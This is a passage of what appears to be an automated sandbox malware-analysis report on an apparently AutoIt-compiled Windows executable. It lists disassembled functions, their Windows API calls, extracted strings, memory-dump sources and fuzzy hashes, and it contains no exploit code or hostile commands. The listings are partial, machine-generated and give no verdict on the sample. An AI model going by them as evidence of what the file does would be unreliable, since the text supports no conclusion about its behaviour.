                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00440EE4,?,?), ref: 0049726E
                                                                • Part of subcall function 00496C35: CloseHandle.KERNEL32(00000000,?,0049727B,?,00440EE4,?,?), ref: 00496C3F
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00497281
                                                              • LeaveCriticalSection.KERNEL32(?,?,00440EE4,?,?), ref: 00497288
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 9ff539d8e1522470b581f9d755e579b58bd1f14244f093c6b0f9c5f17020fdcd
                                                              • Instruction ID: b3ff6f2962ed6495aff27199c9574fa92e6bfc2536a4f7faf5cb2ae373d6ca30
                                                              • Opcode Fuzzy Hash: 9ff539d8e1522470b581f9d755e579b58bd1f14244f093c6b0f9c5f17020fdcd
                                                              • Instruction Fuzzy Hash: 09F05E36540612EBDB161B64ED4CADB7B29EF45702B1006B2F507950A0CB7A5C05CB58
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0048899D
                                                              • UnloadUserProfile.USERENV(?,?), ref: 004889A9
                                                              • CloseHandle.KERNEL32(?), ref: 004889B2
                                                              • CloseHandle.KERNEL32(?), ref: 004889BA
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004889C3
                                                              • HeapFree.KERNEL32(00000000), ref: 004889CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: 812a234739518f6ab167ce24ea6f197e1148ac0a583ca9bacb5e4406cd255783
                                                              • Instruction ID: cf1c454f80ad9c11f746e58b73202d35af95f9cdd7e1cb226c02a7340fe63b4b
                                                              • Opcode Fuzzy Hash: 812a234739518f6ab167ce24ea6f197e1148ac0a583ca9bacb5e4406cd255783
                                                              • Instruction Fuzzy Hash: 9DE0C276004401FBDA011FE5EC0C90ABBA9FB89322B148730F21981070CB32A828DB58
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004C2C7C,?), ref: 004876EA
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004C2C7C,?), ref: 00487702
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,004BFB80,000000FF,?,00000000,00000800,00000000,?,004C2C7C,?), ref: 00487727
                                                              • _memcmp.LIBCMT ref: 00487748
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FromProg$FreeTask_memcmp
                                                              • String ID: ,,L
                                                              • API String ID: 314563124-2286747779
                                                              • Opcode ID: 089deda58d4d1e1e4cf8c398a329a87cfe8cd84680ce6e4f4f5e0a1f033e4560
                                                              • Instruction ID: 07271a76de31aa03033335f5927c3553df63c75a1a09cda362ff46b5e01428f6
                                                              • Opcode Fuzzy Hash: 089deda58d4d1e1e4cf8c398a329a87cfe8cd84680ce6e4f4f5e0a1f033e4560
                                                              • Instruction Fuzzy Hash: E2814C71A00109EFCB00DFA8C994EEEB7B9FF89315F204559F505AB250DB75AE06CB64
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 004A8613
                                                              • CharUpperBuffW.USER32(?,?), ref: 004A8722
                                                              • VariantClear.OLEAUT32(?), ref: 004A889A
                                                                • Part of subcall function 00497562: VariantInit.OLEAUT32(00000000), ref: 004975A2
                                                                • Part of subcall function 00497562: VariantCopy.OLEAUT32(00000000,?), ref: 004975AB
                                                                • Part of subcall function 00497562: VariantClear.OLEAUT32(00000000), ref: 004975B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 5024eb12674345b9fb504591349bf8290733c6462321e1e38230358a64f9add4
                                                              • Instruction ID: 5012a50a711c94112b01d46ef9ddd1fb23ff9c35be60de1a0ef252e2c4b1f56d
                                                              • Opcode Fuzzy Hash: 5024eb12674345b9fb504591349bf8290733c6462321e1e38230358a64f9add4
                                                              • Instruction Fuzzy Hash: E8917D746043019FCB10EF25C48595BBBE4EF9A718F14492EF88A8B361DB39ED05CB56
                                                              APIs
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                              • _memset.LIBCMT ref: 00492B87
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00492BB6
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00492C69
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00492C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: 8f1d9494837154491a22251082912b83c40564d0d7a791eab76941416487efc0
                                                              • Instruction ID: e97f22ad12ceca9444f0708233e55c12eed16d9557aea7680a9cfcfedcce4815
                                                              • Opcode Fuzzy Hash: 8f1d9494837154491a22251082912b83c40564d0d7a791eab76941416487efc0
                                                              • Instruction Fuzzy Hash: 2851CF71508301ABDB24DE28DA45A6FBBE4AF49314F140A3FF895D3291DBA8DC04C75A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_free
                                                              • String ID: 3cD$_D
                                                              • API String ID: 2620147621-3978952248
                                                              • Opcode ID: e090d765b035382bcef98ecd10ad2894956fcb899a1586ff23b89ff9c2ddccfa
                                                              • Instruction ID: 44648c3fd66566955b7360c43d0d55246b43508309d19801bbbbb75dd75163aa
                                                              • Opcode Fuzzy Hash: e090d765b035382bcef98ecd10ad2894956fcb899a1586ff23b89ff9c2ddccfa
                                                              • Instruction Fuzzy Hash: CF518B716043418FEB25CF28C840BABBBF1BF85715F08882EE98987351DB39E905CB46
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$_memmove
                                                              • String ID: 3cD$ERCP
                                                              • API String ID: 2532777613-125502418
                                                              • Opcode ID: d40b2a8e53cf3c6ade2d1d77dd64fecbc772663c7f4379d6d650221474c0d2fe
                                                              • Instruction ID: 6f8bcde29cef68ecf4d0aa0d9042c88e88379e736faca872e6b20a3d5d75084a
                                                              • Opcode Fuzzy Hash: d40b2a8e53cf3c6ade2d1d77dd64fecbc772663c7f4379d6d650221474c0d2fe
                                                              • Instruction Fuzzy Hash: 04519171900705DBEB24DF55C941BABB7E4BF05305F20896FE84ACB281E778AA45CB49
                                                              APIs
                                                              • _memset.LIBCMT ref: 004927C0
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004927DC
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00492822
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004F5890,00000000), ref: 0049286B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 80114f351545fe8a704645891bc162c4211c3dc2cc5009dd3b64f587a613ec52
                                                              • Instruction ID: 01fdf02e388fa77dde16f8afbd4d2b9804049fb124e960108d4c2b1a23fab469
                                                              • Opcode Fuzzy Hash: 80114f351545fe8a704645891bc162c4211c3dc2cc5009dd3b64f587a613ec52
                                                              • Instruction Fuzzy Hash: 7D41A170204301AFDB20EF25C944F1BBBE4AF85314F044A3EF96597391D7B8A905CB6A
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004AD7C5
                                                                • Part of subcall function 0043784B: _memmove.LIBCMT ref: 00437899
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower_memmove
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 3425801089-567219261
                                                              • Opcode ID: e364e49c01f62f0c0c4bd926dc64376140f5ed8904fb49a70acd8b8f9fccf41c
                                                              • Instruction ID: 0d80f2cfec8683ee69c47bb89b25ac92fb8fedaec973c558a8aac2c704ea6a84
                                                              • Opcode Fuzzy Hash: e364e49c01f62f0c0c4bd926dc64376140f5ed8904fb49a70acd8b8f9fccf41c
                                                              • Instruction Fuzzy Hash: 44319C70904205ABCF10EF59CC519AEB3A5FF25324F108A2FE876976D1DB39AD05CB88
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00488F14
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00488F27
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00488F57
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_memmove$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 365058703-1403004172
                                                              • Opcode ID: 79b55b30ab963ce35180daf9ba0a84bf754a26ab4e4be4c4df7cb43368df3afd
                                                              • Instruction ID: 47e3114adf5811cb32fb202004234b244224dcc7077b915bcbd3e4b95e60541c
                                                              • Opcode Fuzzy Hash: 79b55b30ab963ce35180daf9ba0a84bf754a26ab4e4be4c4df7cb43368df3afd
                                                              • Instruction Fuzzy Hash: 0D21F571A00108BBDB14BBA18C45DFFB769DF05324F54492FF925A72E1DB3D180A9718
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004A184C
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004A1872
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004A18A2
                                                              • InternetCloseHandle.WININET(00000000), ref: 004A18E9
                                                                • Part of subcall function 004A2483: GetLastError.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A2498
                                                                • Part of subcall function 004A2483: SetEvent.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: d3d0066d328c56f793d533431c698c9215fd976ec39a09b328f6bfbd44e804d5
                                                              • Instruction ID: c634f435d72239a16352a0f347decf4f3136bb65124c70eb57dfed4f6ad5d61c
                                                              • Opcode Fuzzy Hash: d3d0066d328c56f793d533431c698c9215fd976ec39a09b328f6bfbd44e804d5
                                                              • Instruction Fuzzy Hash: C821B0B1500308BFEB11AF65CC85EBB77EDEB5A748F10412FF80596250EA6C8D0597A9
                                                              APIs
                                                                • Part of subcall function 00431D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00431D73
                                                                • Part of subcall function 00431D35: GetStockObject.GDI32(00000011), ref: 00431D87
                                                                • Part of subcall function 00431D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00431D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004B6461
                                                              • LoadLibraryW.KERNEL32(?), ref: 004B6468
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004B647D
                                                              • DestroyWindow.USER32(?), ref: 004B6485
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: a521bb101b4ec74a018dd755f094dd066bdc75777d3538f45309c5f46166d11b
                                                              • Instruction ID: 1d57da3fb96959cbcb1a8fd3ad3756badc35df23b968db322180204fa327f985
                                                              • Opcode Fuzzy Hash: a521bb101b4ec74a018dd755f094dd066bdc75777d3538f45309c5f46166d11b
                                                              • Instruction Fuzzy Hash: 80218E71100605BFEF108F64DC40EFB77A9EB59328F12462AFA1492290D77DDC519778
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00496DBC
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00496DEF
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00496E01
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00496E3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 99aeeb637150f4b1465c64a9be9c05f7a34a340b5fe12e8b270088efed70712b
                                                              • Instruction ID: 7f3f7da2e7f6bc767c640a524b70d37489df9273f3f1e94aa14c1a768524d900
                                                              • Opcode Fuzzy Hash: 99aeeb637150f4b1465c64a9be9c05f7a34a340b5fe12e8b270088efed70712b
                                                              • Instruction Fuzzy Hash: 56218C7460020AABDF209F29DC04A9A7FA8EF44720F214B3AFCA0D73D0DB759955CB58
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00496E89
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00496EBB
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00496ECC
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00496F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 682a466c2b3d5b12d3f7165aa0fef70d1b9d2f603ce815ade2a4f0832fab97c4
                                                              • Instruction ID: f86c81b4f66469c7d11070121aab3787c2ac66c466e92ca1ccf95872ef2439d7
                                                              • Opcode Fuzzy Hash: 682a466c2b3d5b12d3f7165aa0fef70d1b9d2f603ce815ade2a4f0832fab97c4
                                                              • Instruction Fuzzy Hash: 90219079500305ABDF209F69DC04A9B7BA8EF45724F210B3AF8A0D73D0D774A8518B59
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049AC54
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0049ACA8
                                                              • __swprintf.LIBCMT ref: 0049ACC1
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,004BF910), ref: 0049ACFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 32313a419c3528fbfd0c99ccd6304dec6354f464f9d49fa6895853e2cfc38de7
                                                              • Instruction ID: d3dac4c3fa80b13c47912213b8c96f35cea2868ef054f22dc93a4b1af532dc8a
                                                              • Opcode Fuzzy Hash: 32313a419c3528fbfd0c99ccd6304dec6354f464f9d49fa6895853e2cfc38de7
                                                              • Instruction Fuzzy Hash: 4521A470600109AFCB10EF59CD45EAE7BB8EF49318B00447EF809EB251DA75EE05CB65
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 0049115F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 00491184
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 0049118E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 004911C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID: @I
                                                              • API String ID: 2875609808-896914347
                                                              • Opcode ID: 533c9849eaad2fc183a7a2b1d88e695b247915029a77acd1e0f1842994d18589
                                                              • Instruction ID: affee40a5d7ecd4052049719faedbd6a62e2dbb764091929e6f5f7bdc139d94d
                                                              • Opcode Fuzzy Hash: 533c9849eaad2fc183a7a2b1d88e695b247915029a77acd1e0f1842994d18589
                                                              • Instruction Fuzzy Hash: 78115A31C0051EE7CF009FA9D88AAEEBF78FF09711F004566EA45B2250CB349954CB99
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00491B19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
